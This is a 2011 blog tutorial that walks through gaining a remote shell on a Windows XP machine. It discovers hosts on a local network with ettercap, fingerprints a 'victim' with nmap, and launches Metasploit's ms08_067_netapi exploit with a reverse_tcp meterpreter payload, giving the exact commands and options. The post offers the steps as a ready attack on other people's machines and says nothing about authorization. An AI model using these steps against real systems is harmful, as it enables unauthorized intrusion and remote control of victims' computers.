border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Wednesday, May 11, 2011

Basics of gaining access. (HOW TO GAIN ACCESS)

How to get a meterpreter shell.

Now in this tutorial I am using backtrack 4 r2 and going to be showing you how to get a meterpreter shell.

Here are the basics of gaining any type of shell.

How do we check for live hosts?

First we are going to be scanning to check what ports are open and OS (Operating System) fingerprinting. But before we do that your probably wondering how do we check if people are on the network and if they are what are their IP addresses. Well What I do and believe it is the easiest way by far is running ettercap. So lets run ettercap open up a console and type in.ettercap -G and ettercap will open up.
ettercap -G

[Image: 1.png]

then ettercap opens up.

[Image: 2.png]

Now you can use hotkeys like I do make you look 1337 in front of people but for now we'll just use the mouse SNIFF > UNIFIED SNIFF and choose you interface mine is going to be vmnet1 Beacuse my Windows xp installation is in VmWare. Yours might be wlan0 if your on a wireless network or eth0 if connected LAN.

[Image: 3.png]

Now let's scan HOSTS > SCAN FOR HOSTS I recommend you scan a couple times then HOSTS > HOST LIST and you get your list.

[Image: 4.png]

How do we scan for ports and know what OS he's using?

Okay pick an IP address from the list and remember it. Now open up a new console to scan the victim with namp. Now nmap has a lot of options so it's really easy to get confused.but I don't want to talk too much about it just yet. So now back to our console type in nmap -O [your victims IP] . The -O options is Operating system detection. Then you should get something like this. Now just by looking at this we know its a Windows XP with our favorite port open 445 SMB.
nmap -O

[Image: 5.png]

Now what do we do with our favorite port and all this information?

Now lets open up METASPLOIT .
cd /pentest/exploits/framework3/


[Image: 6.png]


Now always run svnup before starting your attack to update metasploit. You also need to know you IP address if you don't know how type in ifconfig.

Now we now the port number we want to attack it was 445 smb let's use one of the best exploits out right now ms08_067_netapi will never fail you on a XP system trust me on this. Now that we know what exploit we are going to use lets set our payload now the payload is the type of shell you want to spawn could be a vnc cmd or a meterpreter. In this tutorial we are going for a reverse tcp meterpreter witch means he will connect to you. 
use windows/smb/ms08_067_netapi

set payload windows/meterpreter/reverse_tcp

[Image: 7.png]

Now lets see what options we need to set in order to launch the eaploit. Now type in show options and you will get something like what I have below. Do you see where it says required yes that means fill it out. First thing we see is the RHOST remote host witch is the victims ip address next thing is the LHOST local host our ip address.
set rhost [VIMTIM IP]

set lhost [OUR IP]

[Image: 8.png]

[Image: 9.png]

Now lets run it. If everything goes well then you should get something like what i got.

[Image: 10.png]

No comments:

Post a Comment


Twitter Delicious Facebook Digg Stumbleupon Favorites More